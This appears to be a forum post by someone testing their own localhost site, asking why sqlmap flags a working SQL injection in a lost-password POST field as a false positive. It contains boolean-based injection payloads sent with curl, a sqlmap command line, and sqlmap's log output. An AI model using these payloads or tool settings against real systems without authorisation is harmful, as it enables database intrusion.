Ok so I know that my site has an sqli (and boolean/mysql time based).
I even tried both of them myself and the results are very clear and
simple, yet sqlmap doesn't seem to see it. It can find the time based at
first, but it always ends up saying that it's a false positive.

cURL will give me the following result from the page, using "and boolean
based sqli" with a true statement:

curl --data "lostpass=1'%20OR 1=1 AND 1='1" http://localhost/account/index.php

<div class='message' style='padding:10px;'>Your password was e-mailed to 1' OR 1='1</div>


And now a false one:

curl --data "lostpass=1' OR 1=1 AND 1='2" http://localhost/account/index.php


<td class='message'>The email address you entered 1' OR 1=1 AND 1='2 does not exist</p>


I have tried with --string and --text-only with sqlmap, but I get the
same results over and over. Here's some sample output:

python sqlmap.py -u "http://localhost/account/index.php" --random-agent --data="lostpass=1' OR 1='1" --string="Your password was e-mailed to" --text-only --delay=5 --technique=TB


[16:57:34] [INFO] testing connection to the target url
[16:57:49] [INFO] heuristics detected web page charset 'ascii'
[16:57:50] [INFO] testing if the provided string is within the target URL page content
[16:57:56] [INFO] testing if POST parameter 'lostpass' is dynamic
[16:58:05] [INFO] confirming that POST parameter 'lostpass' is dynamic
[16:58:13] [INFO] POST parameter 'lostpass' is dynamic
[16:58:19] [WARNING] heuristic test shows that POST parameter 'lostpass' might not be injectable
[16:58:19] [INFO] testing sql injection on POST parameter 'lostpass'
[16:58:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:59:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:00:48] [INFO] POST parameter 'lostpass' is 'MySQL > 5.0.11 AND time-based blind' injectable
[17:00:48] [INFO] checking if the injection point on POST parameter 'lostpass' is a false positive
[17:03:09] [WARNING] false positive injection point detected
[17:03:09] [WARNING] POST parameter 'lostpass' is not injectable
[17:03:09] [CRITICAL] all parameters appear to be not injectable.

I tried with a sleep(5) injection manually as well, and it works like a
charm. Any ideas?






